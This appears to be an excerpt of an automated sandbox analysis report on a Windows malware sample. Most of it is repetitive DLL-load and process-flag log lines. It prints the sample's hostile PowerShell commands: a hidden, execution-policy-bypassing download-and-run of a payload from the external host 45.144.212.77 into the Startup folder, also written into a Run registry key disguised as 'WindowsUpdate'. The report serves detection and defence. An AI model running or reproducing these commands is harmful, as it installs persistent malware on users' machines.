        Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dll
        Source: C:\Windows\explorer.exeSection loaded: tdh.dll
        Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dll
        Source: C:\Windows\explorer.exeSection loaded: mfplat.dll
        Source: C:\Windows\explorer.exeSection loaded: rtworkq.dll
        Source: C:\Windows\explorer.exeSection loaded: taskflowdataengine.dll
        Source: C:\Windows\explorer.exeSection loaded: structuredquery.dll
        Source: C:\Windows\explorer.exeSection loaded: actxprxy.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dll
        Source: C:\Windows\explorer.exeSection loaded: icu.dll
        Source: C:\Windows\explorer.exeSection loaded: mswb7.dll
        Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dll
        Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dll
        Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dll
        Source: C:\Windows\explorer.exeSection loaded: uianimation.dll
        Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dll
        Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dll
        Source: C:\Windows\explorer.exeSection loaded: npmproxy.dll
        Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
        Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
        Source: C:\Windows\explorer.exeSection loaded: winnsi.dll
        Source: C:\Windows\explorer.exeSection loaded: dpapi.dll
        Source: C:\Windows\explorer.exeSection loaded: msasn1.dll
        Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
        Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
        Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\explorer.exeSection loaded: schannel.dll
        Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
        Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\explorer.exeSection loaded: ntasn1.dll
        Source: C:\Windows\explorer.exeSection loaded: ncrypt.dll
        Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\explorer.exeSection loaded: gpapi.dll
        Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dll
        Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dll
        Source: C:\Windows\explorer.exeSection loaded: daxexec.dll
        Source: C:\Windows\explorer.exeSection loaded: container.dll
        Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dll
        Source: C:\Windows\explorer.exeSection loaded: cryptngc.dll
        Source: C:\Windows\explorer.exeSection loaded: cflapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
        Source: C:\Windows\explorer.exeSection loaded: aepic.dll
        Source: C:\Windows\explorer.exeSection loaded: twinapi.dll
        Source: C:\Windows\explorer.exeSection loaded: userenv.dll
        Source: C:\Users\user\Desktop\1ZXaFij.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: 1ZXaFij.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: 1ZXaFij.exeStatic file information: File size 1320960 > 1048576
        Source: 1ZXaFij.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: 2C:\Users\user\AppData\Local\Temp\vk4yczyv.pdbhPA source: powershell.exe, 00000011.00000002.1485108514.00000203A6605000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: ;C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.pdb source: powershell.exe, 0000000B.00000002.1627613856.00000222B8D69000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 2C:\Users\user\AppData\Local\Temp\vk4yczyv.pdb source: powershell.exe, 00000011.00000002.1485108514.00000203A6605000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: ;C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.pdbhPA source: powershell.exe, 0000000B.00000002.1627613856.00000222B8D69000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Suspicious powershell command line found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roami
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\RoamiJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\RoamiJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vk4yczyv.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vk4yczyv.cmdline"
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400250E0 GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,WideCharToMultiByte,GetProcAddress,GetProcAddress,WideCharToMultiByte,GetModuleHandleW,LoadLibraryW,GetProcAddress,GetProcAddress,2_2_00000001400250E0
        Source: 1ZXaFij.exeStatic PE information: section name: _RDATA
        Source: runps.exe.2.drStatic PE information: section name: _RDATA
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140025CEF push FF000003h; ret 2_2_0000000140025CF5

        Persistence and Installation Behavior

        barindex
        Uses cmd line tools excessively to alter registry or file data
        Source: C:\Users\user\Desktop\1ZXaFij.exeProcess created: reg.exe
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeProcess created: reg.exe
        Source: C:\Users\user\Desktop\1ZXaFij.exeProcess created: reg.exeJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeProcess created: reg.exeJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\vk4yczyv.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.dllJump to dropped file

        Boot Survival

        barindex
        Creates autostart registry keys with suspicious values (likely registry only malware)
        Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate powershell -ExecutionPolicy Bypass -NoProfile -Command Invoke-WebRequest -Uri http://45.144.212.77:16000/client -OutFile C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe; Start-Process C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeJump to behavior
        Drops PE files to the startup folder
        Source: C:\Users\user\Desktop\1ZXaFij.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeJump to dropped file
        Source: C:\Users\user\Desktop\1ZXaFij.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exe\:Zone.Identifier:$DATAJump to behavior
        Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
        Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Uses known network protocols on non-standard ports
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 16000
        Source: unknownNetwork traffic detected: HTTP traffic on port 16000 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 16000
        Source: unknownNetwork traffic detected: HTTP traffic on port 16000 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 16000
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 16000
        Source: unknownNetwork traffic detected: HTTP traffic on port 16000 -> 49837
        Source: unknownNetwork traffic detected: HTTP traffic on port 16000 -> 49785
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014008C580 SendMessageW,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetDlgCtrlID,GetParent,GetWindowRect,GetPropW,ShowWindow,GetUpdateRect,SendMessageW,GetWindowLongW,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,SetFocus,SendMessageW,ShowWindow,SetFocus,InvalidateRect,MapWindowPoints,InvalidateRect,2_2_000000014008C580
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400A65B0 GetWindowThreadProcessId,GetForegroundWindow,IsIconic,ShowWindow,SetForegroundWindow,GetForegroundWindow,GetWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,SetForegroundWindow,GetForegroundWindow,GetWindow,SetForegroundWindow,GetForegroundWindow,GetWindow,AttachThreadInput,AttachThreadInput,BringWindowToTop,2_2_00000001400A65B0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400435B0 IsZoomed,IsIconic,2_2_00000001400435B0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400A2AC0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,2_2_00000001400A2AC0
        Source: C:\Users\user\Desktop\1ZXaFij.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
